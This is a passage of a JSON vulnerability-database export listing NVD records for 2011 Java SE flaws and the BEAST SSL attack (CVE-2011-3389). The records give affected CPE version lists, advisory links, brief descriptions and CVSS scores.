"cpe:/a:sun:jdk:1.6.0:update_13", "cpe:/a:sun:jdk:1.6.0:update_23", "cpe:/a:sun:jdk:1.6.0:update1", "cpe:/a:oracle:jrockit:r28.0.2", "cpe:/a:sun:jdk:1.6.0:update_25", "cpe:/a:sun:jdk:1.6.0:update_6", "cpe:/a:sun:jre:1.6.0:update_5", "cpe:/a:sun:jre:1.6.0:update_19", "cpe:/a:sun:jdk:1.6.0:update_10", "cpe:/a:sun:jdk:1.6.0:update_12", "cpe:/a:sun:jre:1.6.0:update_16", "cpe:/a:sun:jre:1.6.0:update_18", "cpe:/a:sun:jre:1.6.0:update_14", "cpe:/a:sun:jre:1.6.0:update_12", "cpe:/a:sun:jre:1.6.0:update_6", "cpe:/a:oracle:jrockit:r28.1.3", "cpe:/a:sun:jre:1.6.0:update_21", "cpe:/a:sun:jdk:1.6.0:update_3", "cpe:/a:sun:jre:1.6.0:update_15", "cpe:/a:oracle:jrockit:r28.0.1", "cpe:/a:sun:jre:1.7.0", "cpe:/a:sun:jdk:1.6.0:update_14", "cpe:/a:sun:jdk:1.6.0:update_27", "cpe:/a:sun:jre:1.6.0:update_26", "cpe:/a:sun:jdk:1.6.0:update_7"], "id": "CVE-2011-3553", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3553", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-06T12:20:51", "references": ["http://www.redhat.com/support/errata/RHSA-2011-1384.html", "http://marc.info/?l=bugtraq&m=133365109612558&w=2", "http://www.ibm.com/developerworks/java/jdk/alerts/", "http://rhn.redhat.com/errata/RHSA-2013-1455.html", "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", "http://secunia.com/advisories/48308", "http://marc.info/?l=bugtraq&m=134254957702612&w=2", "http://www.ubuntu.com/usn/USN-1263-1", "http://www.securityfocus.com/bid/50216", "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", "http://www.securitytracker.com/id?1026215", "http://marc.info/?l=bugtraq&m=134254866602253&w=2", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70839", "http://marc.info/?l=bugtraq&m=132750579901589&w=2", "http://security.gentoo.org/glsa/glsa-201406-32.xml", "http://www.redhat.com/support/errata/RHSA-2011-1478.html"], "description": "Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors.", "edition": 5, "reporter": "NVD", "published": "2011-10-19T17:55:01", "title": "CVE-2011-3554", "type": "cve", "enchantments": {"score": {"modified": "2018-01-06T12:20:51", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:14524", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14524"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-3554"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:14524", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:14524"}], "modified": "2018-01-05T21:29:20", "cpe": ["cpe:/a:sun:jdk:1.5.0:update9", "cpe:/a:sun:jre:1.6.0:update_20", "cpe:/a:sun:jdk:1.5.0:update12", "cpe:/a:sun:jdk:1.5.0:update26", "cpe:/a:sun:jdk:1.6.0:update_17", "cpe:/a:sun:jre:1.6.0:update_25", "cpe:/a:sun:jre:1.6.0:update_22", "cpe:/a:sun:jdk:1.5.0:update3", "cpe:/a:sun:jre:1.6.0:update_2", "cpe:/a:sun:jre:1.6.0:update_7", "cpe:/a:sun:jdk:1.5.0:update27", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.6.0:update_27", "cpe:/a:sun:jdk:1.5.0:update8", "cpe:/a:sun:jre:1.6.0:update_17", "cpe:/a:sun:jre:1.5.0:update3", "cpe:/a:sun:jdk:1.5.0:update16", "cpe:/a:sun:jre:1.5.0:update13", "cpe:/a:sun:jre:1.5.0:update16", "cpe:/a:sun:jre:1.5.0:update26", "cpe:/a:sun:jdk:1.6.0:update_22", "cpe:/a:sun:jdk:1.6.0:update_19", "cpe:/a:sun:jre:1.6.0:update_13", "cpe:/a:sun:jdk:1.6.0:update2", "cpe:/a:sun:jre:1.5.0:update18", "cpe:/a:sun:jre:1.6.0:update_3", "cpe:/a:sun:jre:1.6.0:update_1", "cpe:/a:sun:jre:1.5.0:update19", "cpe:/a:sun:jre:1.5.0:update27", "cpe:/a:sun:jdk:1.6.0:update_15", "cpe:/a:sun:jdk:1.5.0:update25", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jdk:1.6.0:update_20", "cpe:/a:sun:jdk:1.5.0:update24", "cpe:/a:sun:jdk:1.6.0:update_5", "cpe:/a:sun:jre:1.5.0:update14", "cpe:/a:sun:jre:1.6.0:update_24", "cpe:/a:sun:jre:1.6.0:update_4", "cpe:/a:sun:jre:1.6.0:update_11", "cpe:/a:sun:jre:1.5.0:update29", "cpe:/a:sun:jdk:1.5.0:update23", "cpe:/a:sun:jre:1.5.0:update6", "cpe:/a:sun:jre:1.6.0:update_10", "cpe:/a:sun:jdk:1.6.0:update_16", "cpe:/a:sun:jdk:1.6.0:update_18", "cpe:/a:sun:jre:1.5.0:update4", "cpe:/a:sun:jdk:1.6.0:update_4", "cpe:/a:sun:jre:1.6.0:update_23", "cpe:/a:sun:jdk:1.6.0:update_11", "cpe:/a:sun:jre:1.5.0:update17", "cpe:/a:sun:jre:1.5.0:update8", "cpe:/a:sun:jdk:1.5.0:update11", "cpe:/a:sun:jdk:1.5.0:update6", "cpe:/a:sun:jdk:1.6.0:update_21", "cpe:/a:sun:jdk:1.5.0:update13", "cpe:/a:sun:jdk:1.6.0:update_24", "cpe:/a:sun:jdk:1.6.0:update_26", "cpe:/a:sun:jdk:1.5.0:update17", "cpe:/a:sun:jdk:1.5.0:update10", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:jdk:1.7.0", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:jdk:1.6.0:update_13", "cpe:/a:sun:jre:1.5.0:update1", "cpe:/a:sun:jdk:1.5.0:update21", "cpe:/a:sun:jdk:1.5.0:update11_b03", "cpe:/a:sun:jdk:1.6.0:update_23", "cpe:/a:sun:jdk:1.6.0:update1", "cpe:/a:sun:jdk:1.6.0:update_25", "cpe:/a:sun:jdk:1.6.0:update_6", "cpe:/a:sun:jre:1.6.0:update_5", "cpe:/a:sun:jdk:1.5.0:update4", "cpe:/a:sun:jre:1.5.0:update15", "cpe:/a:sun:jdk:1.5.0:update1", "cpe:/a:sun:jdk:1.5.0:update20", "cpe:/a:sun:jre:1.5.0:update24", "cpe:/a:sun:jre:1.6.0:update_19", "cpe:/a:sun:jre:1.5.0:update7", "cpe:/a:sun:jdk:1.6.0:update_10", "cpe:/a:sun:jre:1.5.0:update10", "cpe:/a:sun:jdk:1.6.0:update_12", "cpe:/a:sun:jre:1.6.0:update_16", "cpe:/a:sun:jdk:1.5.0:update2", "cpe:/a:sun:jre:1.5.0:update2", "cpe:/a:sun:jdk:1.5.0:update7", "cpe:/a:sun:jre:1.5.0:update12", "cpe:/a:sun:jdk:1.5.0:update22", "cpe:/a:sun:jdk:1.5.0:update14", "cpe:/a:sun:jre:1.5.0:update23", "cpe:/a:sun:jre:1.5.0:update9", "cpe:/a:sun:jre:1.6.0:update_18", "cpe:/a:sun:jre:1.6.0:update_14", "cpe:/a:sun:jdk:1.5.0:update15", "cpe:/a:sun:jre:1.5.0:update31", "cpe:/a:sun:jre:1.6.0:update_12", "cpe:/a:sun:jre:1.5.0:update22", "cpe:/a:sun:jre:1.6.0:update_6", "cpe:/a:sun:jdk:1.5.0:update31", "cpe:/a:sun:jdk:1.5.0:update5", "cpe:/a:sun:jdk:1.5.0:update29", "cpe:/a:sun:jre:1.6.0:update_21", "cpe:/a:sun:jre:1.5.0:update25", "cpe:/a:sun:jdk:1.5.0:update28", "cpe:/a:sun:jdk:1.6.0:update_3", "cpe:/a:sun:jre:1.5.0:update21", "cpe:/a:sun:jdk:1.5.0:update7_b03", "cpe:/a:sun:jre:1.5.0:update5", "cpe:/a:sun:jre:1.6.0:update_15", "cpe:/a:sun:jre:1.5.0:update11", "cpe:/a:sun:jre:1.7.0", "cpe:/a:sun:jdk:1.5.0:update18", "cpe:/a:sun:jdk:1.6.0:update_14", "cpe:/a:sun:jre:1.5.0:update20", "cpe:/a:sun:jdk:1.6.0:update_27", "cpe:/a:sun:jdk:1.5.0:update19", "cpe:/a:sun:jre:1.6.0:update_26", "cpe:/a:sun:jdk:1.6.0:update_7"], "id": "CVE-2011-3554", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3554", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-01T05:13:16", "references": ["http://www.redhat.com/support/errata/RHSA-2011-1384.html", "http://marc.info/?l=bugtraq&m=133365109612558&w=2", "http://www.redhat.com/support/errata/RHSA-2012-0006.html", "http://www.ibm.com/developerworks/java/jdk/alerts/", "http://rhn.redhat.com/errata/RHSA-2013-1455.html", "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", "http://secunia.com/advisories/48308", "http://marc.info/?l=bugtraq&m=134254957702612&w=2", "http://marc.info/?l=bugtraq&m=133728004526190&w=2", "http://www.ubuntu.com/usn/USN-1263-1", "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", "http://www.securitytracker.com/id?1026215", "http://marc.info/?l=bugtraq&m=134254866602253&w=2", "http://marc.info/?l=bugtraq&m=132750579901589&w=2", "http://www.securityfocus.com/bid/50243", "http://security.gentoo.org/glsa/glsa-201406-32.xml", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70846", "http://www.redhat.com/support/errata/RHSA-2011-1478.html"], "description": "Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Networking.", "edition": 6, "reporter": "NVD", "published": "2011-10-19T17:55:01", "title": "CVE-2011-3547", "type": "cve", "enchantments": {"score": {"modified": "2018-11-01T05:13:16", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:14339", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14339"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-3547"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:14339", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:14339"}], "modified": "2018-10-30T12:26:24", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jdk:1.5.0:update9", "cpe:/a:sun:jre:1.6.0:update_20", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jdk:1.6.0:update1_b06", "cpe:/a:oracle:jdk:1.6.0:update_23", "cpe:/a:sun:jdk:1.4.2_9", "cpe:/a:sun:jdk:1.5.0:update12", "cpe:/a:sun:jre:1.4.2_31", "cpe:/a:sun:jdk:1.5.0:update26", "cpe:/a:sun:jdk:1.6.0:update_17", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jdk:1.4.2_24::solaris", "cpe:/a:sun:jdk:1.5.0:update3", "cpe:/a:sun:jdk:1.4.2_23", "cpe:/a:sun:jre:1.6.0:update_2", "cpe:/a:sun:jre:1.6.0:update_7", "cpe:/a:sun:jdk:1.5.0:update27", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:oracle:jdk:1.6.0:update_24", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jdk:1.4.2_14", "cpe:/a:sun:jdk:1.5.0:update8", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.6.0:update_17", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.5.0:update3", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:jdk:1.5.0:update16", "cpe:/a:sun:jre:1.5.0:update13", "cpe:/a:sun:jdk:1.4.2_26", "cpe:/a:sun:jre:1.5.0:update16", "cpe:/a:sun:jre:1.5.0:update26", "cpe:/a:sun:jdk:1.6.0:update_19", "cpe:/a:sun:jre:1.6.0:update_13", "cpe:/a:sun:jdk:1.6.0:update2", "cpe:/a:sun:jre:1.5.0:update18", "cpe:/a:sun:jre:1.6.0:update_3", "cpe:/a:sun:jre:1.6.0:update_1", "cpe:/a:sun:jre:1.5.0:update19", "cpe:/a:sun:jre:1.5.0:update27", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:jdk:1.6.0:update_15", "cpe:/a:sun:jdk:1.5.0:update25", "cpe:/a:sun:jdk:1.4.2_7", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jdk:1.6.0:update_20", "cpe:/a:sun:jdk:1.5.0:update24", "cpe:/a:sun:jdk:1.4.2_29", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jdk:1.6.0:update_5", "cpe:/a:sun:jre:1.5.0:update14", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:jre:1.6.0:update_4", "cpe:/a:sun:jdk:1.4.2_11", "cpe:/a:sun:jre:1.6.0:update_11", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jdk:1.4.2_28", "cpe:/a:sun:jre:1.5.0:update29", "cpe:/a:sun:jdk:1.5.0:update23", "cpe:/a:sun:jre:1.5.0:update6", "cpe:/a:sun:jre:1.6.0:update_10", "cpe:/a:sun:jdk:1.6.0:update_16", "cpe:/a:sun:jdk:1.6.0:update_18", "cpe:/a:sun:jdk:1.4.2_31", "cpe:/a:sun:jre:1.5.0:update4", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jdk:1.6.0:update_4", "cpe:/a:sun:jdk:1.6.0:update_11", "cpe:/a:sun:jre:1.5.0:update17", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:jre:1.5.0:update8", "cpe:/a:sun:jre:1.5.0:update28", "cpe:/a:sun:jdk:1.4.2_27", "cpe:/a:sun:jdk:1.5.0:update11", "cpe:/a:oracle:jre:1.6.0:update_26", "cpe:/a:sun:jdk:1.4.2_6", "cpe:/a:sun:jdk:1.5.0:update6", "cpe:/a:sun:jdk:1.6.0:update_21", "cpe:/a:sun:jdk:1.4.2_15", "cpe:/a:sun:jre:1.4.2_25", "cpe:/a:sun:jdk:1.5.0:update13", "cpe:/a:sun:jdk:1.4.2_4", "cpe:/a:sun:jdk:1.5.0:update17", "cpe:/a:sun:jdk:1.4.2_32", "cpe:/a:sun:jdk:1.5.0:update10", "cpe:/a:oracle:jdk:1.7.0", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:jdk:1.4.2_33", "cpe:/a:sun:jdk:1.4.2_16", "cpe:/a:sun:jre:1.4.2_29", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:jdk:1.6.0:update_13", "cpe:/a:sun:jre:1.5.0:update1", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jdk:1.4.2_3", "cpe:/a:sun:jdk:1.5.0:update21", "cpe:/a:sun:jdk:1.5.0:update11_b03", "cpe:/a:oracle:jre:1.6.0:update_24", "cpe:/a:sun:jre:1.4.2_26", "cpe:/a:sun:jre:1.4.2_27", "cpe:/a:sun:jdk:1.6.0:update1", "cpe:/a:sun:jdk:1.6.0:update_6", "cpe:/a:sun:jre:1.6.0:update_5", "cpe:/a:oracle:jre:1.6.0:update_23", "cpe:/a:sun:jdk:1.5.0:update4", "cpe:/a:sun:jre:1.5.0:update15", "cpe:/a:sun:jdk:1.5.0:update1", "cpe:/a:oracle:jdk:1.6.0:update_27", "cpe:/a:sun:jdk:1.5.0:update20", "cpe:/a:sun:jre:1.5.0:update24", "cpe:/a:oracle:jre:1.6.0:update_25", "cpe:/a:sun:jre:1.6.0:update_19", "cpe:/a:sun:jdk:1.4.2", "cpe:/a:oracle:jre:1.7.0", "cpe:/a:sun:jre:1.5.0:update7", "cpe:/a:sun:jdk:1.6.0:update_10", "cpe:/a:sun:jre:1.5.0:update10", "cpe:/a:sun:jre:1.4.2_30", "cpe:/a:sun:jdk:1.6.0:update_12", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.6.0:update_16", "cpe:/a:sun:jre:1.4.2_28", "cpe:/a:sun:jdk:1.5.0:update2", "cpe:/a:sun:jdk:1.4.2_30", "cpe:/a:sun:jdk:1.4.2_18", "cpe:/a:sun:jre:1.5.0:update2", "cpe:/a:oracle:jdk:1.6.0:update_25", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:jdk:1.5.0:update7", "cpe:/a:sun:jre:1.5.0:update12", "cpe:/a:sun:jdk:1.5.0:update22", "cpe:/a:sun:jdk:1.5.0:update14", "cpe:/a:sun:jdk:1.4.2_5", "cpe:/a:sun:jre:1.5.0:update23", "cpe:/a:sun:jdk:1.4.2_8", "cpe:/a:sun:jre:1.5.0:update9", "cpe:/a:sun:jre:1.6.0:update_18", "cpe:/a:sun:jre:1.6.0:update_14", "cpe:/a:sun:jdk:1.6.0:update_20:x64", "cpe:/a:sun:jdk:1.5.0:update15", "cpe:/a:sun:jre:1.5.0:update31", "cpe:/a:sun:jre:1.6.0:update_12", "cpe:/a:sun:jre:1.5.0:update22", "cpe:/a:sun:jdk:1.4.2_17", "cpe:/a:sun:jre:1.6.0:update_6", "cpe:/a:sun:jdk:1.4.2_1", "cpe:/a:sun:jdk:1.4.2_25", "cpe:/a:sun:jdk:1.4.2_10", "cpe:/a:sun:jre:1.4.2_32", "cpe:/a:sun:jdk:1.5.0:update31", "cpe:/a:sun:jdk:1.5.0:update5", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:jdk:1.4.2_13", "cpe:/a:sun:jdk:1.5.0:update29", "cpe:/a:sun:jre:1.6.0:update_21", "cpe:/a:oracle:jdk:1.6.0:update_26", "cpe:/a:sun:jdk:1.4.2_19", "cpe:/a:sun:jre:1.5.0:update25", "cpe:/a:sun:jdk:1.5.0:update28", "cpe:/a:sun:jdk:1.4.2_22", "cpe:/a:oracle:jre:1.6.0:update_22", "cpe:/a:sun:jdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_23", "cpe:/a:sun:jdk:1.6.0:update_3", "cpe:/a:sun:jre:1.5.0:update21", "cpe:/a:sun:jre:1.4.2_33", "cpe:/a:sun:jdk:1.5.0:update7_b03", "cpe:/a:sun:jre:1.5.0:update5", "cpe:/a:sun:jre:1.6.0:update_15", "cpe:/a:sun:jre:1.5.0:update11", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:oracle:jre:1.6.0:update_27", "cpe:/a:sun:jre:1.4.2_24", "cpe:/a:sun:jdk:1.5.0:update18", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:1.4.2_2", "cpe:/a:oracle:jdk:1.6.0:update_22", "cpe:/a:sun:jdk:1.6.0:update_14", "cpe:/a:sun:jre:1.5.0:update20", "cpe:/a:sun:jdk:1.5.0:update19", "cpe:/a:sun:jdk:1.6.0:update_7"], "id": "CVE-2011-3547", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3547", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-06T12:20:51", "references": ["http://www.redhat.com/support/errata/RHSA-2011-1384.html", "http://www.ibm.com/developerworks/java/jdk/alerts/", "http://rhn.redhat.com/errata/RHSA-2013-1455.html", "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", "http://secunia.com/advisories/48308", "http://marc.info/?l=bugtraq&m=134254957702612&w=2", "http://www.ubuntu.com/usn/USN-1263-1", "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", "http://www.securitytracker.com/id?1026215", "http://marc.info/?l=bugtraq&m=134254866602253&w=2", "http://www.securityfocus.com/bid/50218", "http://marc.info/?l=bugtraq&m=132750579901589&w=2", "http://security.gentoo.org/glsa/glsa-201406-32.xml", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70849"], "description": "Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Scripting.", "edition": 5, "reporter": "NVD", "published": "2011-10-19T17:55:01", "title": "CVE-2011-3544", "type": "cve", "enchantments": {"score": {"modified": "2018-01-06T12:20:51", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:13947", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13947"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-3544"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:13947", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:13947"}], "modified": "2018-01-05T21:29:19", "cpe": ["cpe:/a:sun:jre:1.6.0:update_20", "cpe:/a:sun:jdk:1.6.0:update_17", "cpe:/a:sun:jre:1.6.0:update_25", "cpe:/a:sun:jre:1.6.0:update_22", "cpe:/a:sun:jre:1.6.0:update_2", "cpe:/a:sun:jre:1.6.0:update_7", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.6.0:update_27", "cpe:/a:sun:jre:1.6.0:update_17", "cpe:/a:sun:jdk:1.6.0:update_22", "cpe:/a:sun:jdk:1.6.0:update_19", "cpe:/a:sun:jre:1.6.0:update_13", "cpe:/a:sun:jdk:1.6.0:update2", "cpe:/a:sun:jre:1.6.0:update_3", "cpe:/a:sun:jre:1.6.0:update_1", "cpe:/a:sun:jdk:1.6.0:update_15", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jdk:1.6.0:update_20", "cpe:/a:sun:jdk:1.6.0:update_5", "cpe:/a:sun:jre:1.6.0:update_24", "cpe:/a:sun:jre:1.6.0:update_4", "cpe:/a:sun:jre:1.6.0:update_11", "cpe:/a:sun:jre:1.6.0:update_10", "cpe:/a:sun:jdk:1.6.0:update_16", "cpe:/a:sun:jdk:1.6.0:update_18", "cpe:/a:sun:jdk:1.6.0:update_4", "cpe:/a:sun:jre:1.6.0:update_23", "cpe:/a:sun:jdk:1.6.0:update_11", "cpe:/a:sun:jdk:1.6.0:update_21", "cpe:/a:sun:jdk:1.6.0:update_24", "cpe:/a:sun:jdk:1.6.0:update_26", "cpe:/a:sun:jdk:1.7.0", "cpe:/a:sun:jdk:1.6.0:update_13", "cpe:/a:sun:jdk:1.6.0:update_23", "cpe:/a:sun:jdk:1.6.0:update1", "cpe:/a:sun:jdk:1.6.0:update_25", "cpe:/a:sun:jdk:1.6.0:update_6", "cpe:/a:sun:jre:1.6.0:update_5", "cpe:/a:sun:jre:1.6.0:update_19", "cpe:/a:sun:jdk:1.6.0:update_10", "cpe:/a:sun:jdk:1.6.0:update_12", "cpe:/a:sun:jre:1.6.0:update_16", "cpe:/a:sun:jre:1.6.0:update_18", "cpe:/a:sun:jre:1.6.0:update_14", "cpe:/a:sun:jre:1.6.0:update_12", "cpe:/a:sun:jre:1.6.0:update_6", "cpe:/a:sun:jre:1.6.0:update_21", "cpe:/a:sun:jdk:1.6.0:update_3", "cpe:/a:sun:jre:1.6.0:update_15", "cpe:/a:sun:jre:1.7.0", "cpe:/a:sun:jdk:1.6.0:update_14", "cpe:/a:sun:jdk:1.6.0:update_27", "cpe:/a:sun:jre:1.6.0:update_26", "cpe:/a:sun:jdk:1.6.0:update_7"], "id": "CVE-2011-3544", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3544", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-13T11:35:18", "references": ["http://curl.haxx.se/docs/adv_20120124B.html", "http://www.securitytracker.com/id?1026704", "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", "http://eprint.iacr.org/2006/136", "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", "http://security.gentoo.org/glsa/glsa-201203-02.xml", "http://www.redhat.com/support/errata/RHSA-2011-1384.html", "http://marc.info/?l=bugtraq&m=133365109612558&w=2", "http://www.securityfocus.com/bid/49778", "https://hermes.opensuse.org/messages/13155432", "http://www.redhat.com/support/errata/RHSA-2012-0006.html", "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", "http://marc.info/?l=bugtraq&m=132872385320240&w=2", "http://www.ibm.com/developerworks/java/jdk/alerts/", "http://rhn.redhat.com/errata/RHSA-2013-1455.html", "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", "http://rhn.redhat.com/errata/RHSA-2012-0508.html", "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", "http://www.opera.com/docs/changelogs/mac/1151/", "http://www.kb.cert.org/vuls/id/864643", "http://www.securitytracker.com/id?1026103", "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", "https://bugzilla.redhat.com/show_bug.cgi?id=737506", "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", "http://support.apple.com/kb/HT5281", "http://support.apple.com/kb/HT5001", "http://marc.info/?l=bugtraq&m=134254957702612&w=2", "http://marc.info/?l=bugtraq&m=133728004526190&w=2", "http://www.ubuntu.com/usn/USN-1263-1", "http://secunia.com/advisories/48256", "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", "http://support.apple.com/kb/HT6150", "http://marc.info/?l=bugtraq&m=134254866602253&w=2", "https://hermes.opensuse.org/messages/13154861", "http://www.opera.com/docs/changelogs/unix/1160/", "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", "http://ekoparty.org/2011/juliano-rizzo.php", "http://www.opera.com/docs/changelogs/windows/1160/", "http://www.opera.com/docs/changelogs/mac/1160/", "http://support.apple.com/kb/HT5501", "http://technet.microsoft.com/security/advisory/2588513", "http://marc.info/?l=bugtraq&m=132750579901589&w=2", "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", "http://www.opera.com/docs/changelogs/windows/1151/", "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", "http://vnhacker.blogspot.com/2011/09/beast.html", "http://eprint.iacr.org/2004/111", "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", "http://security.gentoo.org/glsa/glsa-201406-32.xml", "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", "http://www.insecure.cl/Beast-SSL.rar", "http://www.debian.org/security/2012/dsa-2398", "http://support.apple.com/kb/HT4999", "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", "http://www.securityfocus.com/bid/49388", "https://bugzilla.novell.com/show_bug.cgi?id=719047", "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", "http://secunia.com/advisories/47998", "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", "http://downloads.asterisk.org/pub/security/AST-2016-001.html", "http://www.securitytracker.com/id/1029190", "http://www.opera.com/support/kb/view/1004/", "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", "http://www.securitytracker.com/id?1025997", "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://support.apple.com/kb/HT5130", "http://www.opera.com/docs/changelogs/unix/1151/"], "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a \"BEAST\" attack.", "edition": 10, "reporter": "NVD", "published": "2011-09-06T15:55:03", "title": "CVE-2011-3389", "type": "cve", "enchantments": {"score": {"modified": 